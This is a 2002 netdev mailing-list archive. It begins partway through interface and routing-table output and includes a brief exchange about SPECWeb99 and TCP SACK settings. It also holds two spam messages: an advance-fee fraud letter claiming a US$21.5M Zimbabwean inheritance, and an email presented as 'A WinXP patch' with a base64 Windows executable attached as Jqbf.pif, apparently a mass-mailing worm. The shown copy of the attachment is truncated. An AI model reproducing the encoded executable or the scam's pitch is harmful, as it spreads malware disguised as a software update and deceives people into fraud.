dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:100 RX bytes:336578 (328.6 Kb) TX bytes:290474 (283.6 Kb) Interrupt:50 Base address:0x2000 Memory:fe180000-fe180038 eth1 Link encap:Ethernet HWaddr 00:02:B3:9C:F5:9E inet addr:192.168.4.1 Bcast:192.168.4.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:74893662 errors:3 dropped:3 overruns:0 frame:0 TX packets:100464074 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:100 RX bytes:1286843881 (1227.2 Mb) TX bytes:2106085286 (2008.5 Mb) Interrupt:61 Base address:0x1200 Memory:fc020000-0 eth2 Link encap:Ethernet HWaddr 00:02:B3:A8:35:C1 inet addr:192.168.2.1 Bcast:192.168.2.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:4 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:100 RX bytes:0 (0.0 b) TX bytes:256 (256.0 b) Interrupt:54 Base address:0x1220 Memory:fc060000-0 eth3 Link encap:Ethernet HWaddr 00:02:B3:A3:47:E7 inet addr:192.168.3.1 Bcast:192.168.3.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:50054881 errors:0 dropped:0 overruns:0 frame:0 TX packets:67122955 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:100 RX bytes:3730406436 (3557.5 Mb) TX bytes:3034087396 (2893.5 Mb) Interrupt:44 Base address:0x2040 Memory:fe120000-0 eth4 Link encap:Ethernet HWaddr 00:02:B3:A3:46:F9 inet addr:192.168.1.1 Bcast:192.168.1.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:48 errors:0 dropped:0 overruns:0 frame:0 TX packets:4 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:100 RX bytes:7342 (7.1 Kb) TX bytes:256 (256.0 b) Interrupt:36 Base address:0x2060 Memory:fe160000-0 eth5 Link encap:Ethernet HWaddr 00:02:B3:A3:47:88 inet addr:192.168.5.1 Bcast:192.168.5.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:149206960 errors:2861 dropped:2861 overruns:0 frame:0 TX packets:200247016 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:100 RX bytes:2530107402 (2412.8 Mb) TX bytes:3331495154 (3177.1 Mb) Interrupt:32 Base address:0x3000 Memory:fe420000-0 eth6 Link encap:Ethernet HWaddr 00:02:B3:9C:F5:A0 inet addr:192.168.6.1 Bcast:192.168.6.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:13 errors:0 dropped:0 overruns:0 frame:0 TX packets:10 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:100 RX bytes:832 (832.0 b) TX bytes:640 (640.0 b) Interrupt:28 Base address:0x3020 Memory:fe460000-0 eth7 Link encap:Ethernet HWaddr 00:02:B3:A3:47:39 inet addr:192.168.7.1 Bcast:192.168.7.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:151162569 errors:2993 dropped:2993 overruns:0 frame:0 TX packets:202895482 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:100 RX bytes:2673954954 (2550.0 Mb) TX bytes:2456469394 (2342.6 Mb) Interrupt:24 Base address:0x4000 Memory:fe820000-0 eth8 Link encap:Ethernet HWaddr 00:02:B3:A3:47:87 inet addr:192.168.8.1 Bcast:192.168.8.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:4 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:100 RX bytes:0 (0.0 b) TX bytes:256 (256.0 b) Interrupt:20 Base address:0x4020 Memory:fe860000-0 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:100 errors:0 dropped:0 overruns:0 frame:0 TX packets:100 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:8696 (8.4 Kb) TX bytes:8696 (8.4 Kb) *************** * netstat -rn * *************** Kernel IP routing table Destination Gateway Genmask Flags MSS Window irtt Iface 192.168.7.0 0.0.0.0 255.255.255.0 U 40 0 0 eth7 192.168.6.0 0.0.0.0 255.255.255.0 U 40 0 0 eth6 192.168.5.0 0.0.0.0 255.255.255.0 U 40 0 0 eth5 192.168.4.0 0.0.0.0 255.255.255.0 U 40 0 0 eth1 192.168.3.0 0.0.0.0 255.255.255.0 U 40 0 0 eth3 192.168.2.0 0.0.0.0 255.255.255.0 U 40 0 0 eth2 192.168.1.0 0.0.0.0 255.255.255.0 U 40 0 0 eth4 9.3.192.0 0.0.0.0 255.255.255.0 U 40 0 0 eth0 192.168.8.0 0.0.0.0 255.255.255.0 U 40 0 0 eth8 127.0.0.0 0.0.0.0 255.0.0.0 U 40 0 0 lo 0.0.0.0 9.3.192.1 0.0.0.0 UG 40 0 0 eth0 From niv@us.ibm.com Fri Sep 6 17:14:11 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 17:14:17 -0700 (PDT) Received: from e1.ny.us.ibm.com (e1.ny.us.ibm.com [32.97.182.101]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g870EBtG022901 for ; Fri, 6 Sep 2002 17:14:11 -0700 Received: from northrelay01.pok.ibm.com (northrelay01.pok.ibm.com [9.56.224.149]) by e1.ny.us.ibm.com (8.12.2/8.12.2) with ESMTP id g870IIEG054058; Fri, 6 Sep 2002 20:18:18 -0400 Received: from smtp.linux.ibm.com (ltc-eth1000.torolab.ibm.com [9.26.4.197]) by northrelay01.pok.ibm.com (8.12.3/NCO/VER6.4) with ESMTP id g870IFtW104618; Fri, 6 Sep 2002 20:18:16 -0400 Received: from imap.linux.ibm.com (imap.linux.ibm.com [9.27.103.44]) by smtp.linux.ibm.com (Postfix) with ESMTP id 6F3613FE06; Fri, 6 Sep 2002 20:18:17 -0400 (EDT) Received: by imap.linux.ibm.com (Postfix, from userid 99) id B66D123C00D; Fri, 6 Sep 2002 20:18:16 -0400 (EDT) Received: from 9.47.18.15 ( [9.47.18.15]) as user niv@imap.linux.ibm.com by imap.linux.ibm.com with HTTP; Fri, 6 Sep 2002 17:18:16 -0700 Message-ID: <1031357896.3d7945c875a7e@imap.linux.ibm.com> Date: Fri, 6 Sep 2002 17:18:16 -0700 From: Nivedita Singhvi To: Troy Wilson Cc: jamal , linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 References: <200209062356.g86Nu4Gk016944@tempest.prismnet.com> In-Reply-To: <200209062356.g86Nu4Gk016944@tempest.prismnet.com> MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit User-Agent: Internet Messaging Program (IMP) 3.0 X-Originating-IP: 9.47.18.15 X-archive-position: 139 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: niv@us.ibm.com Precedence: bulk X-list: netdev Quoting Troy Wilson : > > Do you have any stats from the hardware that could show > > retransmits etc; Troy, Are tcp_sack, tcp_fack, tcp_dsack turned on? thanks, Nivedita From tcw@tempest.prismnet.com Fri Sep 6 17:23:22 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 17:23:23 -0700 (PDT) Received: from tempest.prismnet.com (root@tempest.prismnet.com [209.198.128.6]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g870NLtG023316 for ; Fri, 6 Sep 2002 17:23:21 -0700 Received: from tempest.prismnet.com (tcw@localhost [127.0.0.1]) by tempest.prismnet.com (8.12.5/8.12.5) with ESMTP id g870RXwf017283; Fri, 6 Sep 2002 19:27:33 -0500 (CDT) (envelope-from tcw@tempest.prismnet.com) Received: (from tcw@localhost) by tempest.prismnet.com (8.12.5/8.12.5/Submit) id g870RXFc017282; Fri, 6 Sep 2002 19:27:33 -0500 (CDT) From: Troy Wilson Message-Id: <200209070027.g870RXFc017282@tempest.prismnet.com> Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 In-Reply-To: <1031357896.3d7945c875a7e@imap.linux.ibm.com> "from Nivedita Singhvi at Sep 6, 2002 05:18:16 pm" To: Nivedita Singhvi Date: Fri, 6 Sep 2002 19:27:33 -0500 (CDT) CC: jamal , linux-kernel@vger.kernel.org, netdev@oss.sgi.com X-Mailer: ELM [version 2.4ME+ PL82 (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII X-archive-position: 140 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: tcw@tempest.prismnet.com Precedence: bulk X-list: netdev > Are tcp_sack, tcp_fack, tcp_dsack turned on? tcp_fack and tcp_dsack are on, tcp_sack is off. - Troy From jdmulete@netscape.net Sat Sep 7 04:54:35 2002 Received: with ECARTIS (v1.0.0; list netdev); Sat, 07 Sep 2002 04:54:40 -0700 (PDT) Received: from oss.sgi.com (node-c-07f1.a2000.nl [62.194.7.241]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g87BsWtG001071 for ; Sat, 7 Sep 2002 04:54:34 -0700 Message-Id: <200209071154.g87BsWtG001071@oss.sgi.com> From: "EDWARD MULETE" Date: Sat, 07 Sep 2002 13:58:44 To: netdev@oss.sgi.com Subject: URGENT ASSISTANCE MIME-Version: 1.0 Content-Type: text/plain;charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-archive-position: 141 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jdmulete@netscape.net Precedence: bulk X-list: netdev ATTN: I am Edward Mulete JR. the son of Mr. STEVE MBEKI MULETE from Zimbabwe. I am sorry this mail Will surprise you, though we do not know, my mother Mrs. Clara Got your contact through her private search. Due to the current war against white farmers in Zimbabwe and the support of President Robert Mugabe to Claim all white owned farms in our country to gain Favor for re-election. All white farmers were asked to Surrender their farms to the government for Re-distribution and infact to his political party Members and my father though black was the treasury of the farmers association and a strong member of an Opposition party that did not support the president Idea. He then ordered his party members and the police Under his pay row to invade my father's farm and burn Down everything in the farm. They killed my Father and took away a lot of items from his farm. After the death of my father, our local pastor and a Close friend of my father handed us over will Documents with instructions from my father that we Should leave Zimbabwe incase anything happen to him. The will Documents has a certificate of deposit, confirming a deposit Kept in custody for us in a security company unknown To the company that the content is money hence it was deposited as Personal belongings and ensure that we do not remain here as we could Easily be found by his enemies. The total amount is US$21.5M.We are therefore soliciting for Your assistance to help us move the fund out of Zimbabwe, as our fate and future is far from reality, hence this mail to you. The president's present ban of International Press into Zimbabwe and the drop from office of the Finance Minister to avoid giving white farmers fund Transfer Clearance above US$1M is just a few of the Unthinkable things he is committing in my Country. I have tried to reach my father's close friend Mr. John Casahans from Australia also a farmer who was Leaving in Zimbabwe with us but left with his family Late last year following this ugly development to no Avail. Should you be interested to help us, contact me Immediately via email for easy communication and I Will furnish you with the time frame and modalities of the transaction. We have concluded a wonderful plan of Caring out the transfer within two weeks. Please note that This transaction is100% confidential and risk free and will Not endanger you or us in any way. We have resolved to give you 20% Of the total sum upon confirmation of the fund in any Account of your choice were the incident of taxation will not take much tool on the money and we look Forward to coming over to your country to invest our Share and settle there. I will a private Phone so that our conversation can be 100% confidential. Please do not use the reply button, reply only to jdmulete7@netscape.net Please take note. God bless you indeed as you help yourself and us. Mr. EDWARD MULETE PLEASE REPLY TO jdmulete7@netscape.net From kornosz@berti.pl Sat Sep 7 06:49:22 2002 Received: with ECARTIS (v1.0.0; list netdev); Sat, 07 Sep 2002 06:49:23 -0700 (PDT) Received: from forward.ie.com.pl (forward.ie.com.pl [213.77.58.4]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g87DnDtG004049 for ; Sat, 7 Sep 2002 06:49:14 -0700 Received: from Zvm [66.73.160.79] by forward.ie.com.pl (SMTPD32-6.06) id A00EA8C600F8; Sat, 07 Sep 2002 15:33:02 +0200 From: support To: netdev@oss.sgi.com Subject: A WinXP patch MIME-Version: 1.0 Content-Type: multipart/alternative; boundary=JX9B723k1m6247sb1270X8y1Oj6xCv525579A Message-Id: <200209071533390.SM00138@Zvm> Date: Sat, 7 Sep 2002 15:38:03 +0200 X-archive-position: 142 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: support@sis.com.tw Precedence: bulk X-list: netdev --JX9B723k1m6247sb1270X8y1Oj6xCv525579A Content-Type: text/html; Content-Transfer-Encoding: quoted-printable Hi,This is a WinXP patch
I hope you would like it.
--JX9B723k1m6247sb1270X8y1Oj6xCv525579A Content-Type: application/octet-stream; name=Jqbf.pif Content-Transfer-Encoding: base64 Content-ID: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4g RE9TIG1vZGUuDQ0KJAAAAAAAAAAYmX3gXPgTs1z4E7Nc+BOzJ+Qfs1j4E7Pf5B2zT/gTs7Tn GbNm+BOzPucAs1X4E7Nc+BKzJfgTs7TnGLNO+BOz5P4Vs134E7NSaWNoXPgTswAAAAAAAAAA UEUAAEwBBAC4jrc8AAAAAAAAAADgAA8BCwEGAADAAAAAkAgAAAAAAFiEAAAAEAAAANAAAAAA QAAAEAAAABAAAAQAAAAAAAAABAAAAAAAAAAAYAkAABAAAAAAAAACAAAAAAAQAAAQAAAAABAA ABAAAAAAAAAQAAAAAAAAAAAAAAAg1gAAZAAAAABQCQAQAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ANAAAOwBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAAEq6AAAAEAAAAMAAAAAQ AAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAAAiEAAAANAAAAAgAAAA0AAAAAAAAAAAAAAAAAAA QAAAQC5kYXRhAAAAbF4IAADwAAAAUAAAAPAAAAAAAAAAAAAAAAAAAEAAAMAucnNyYwAAABAA AAAAUAkAEAAAAABAAQAAAAAAAAAAAAAAAABAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 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 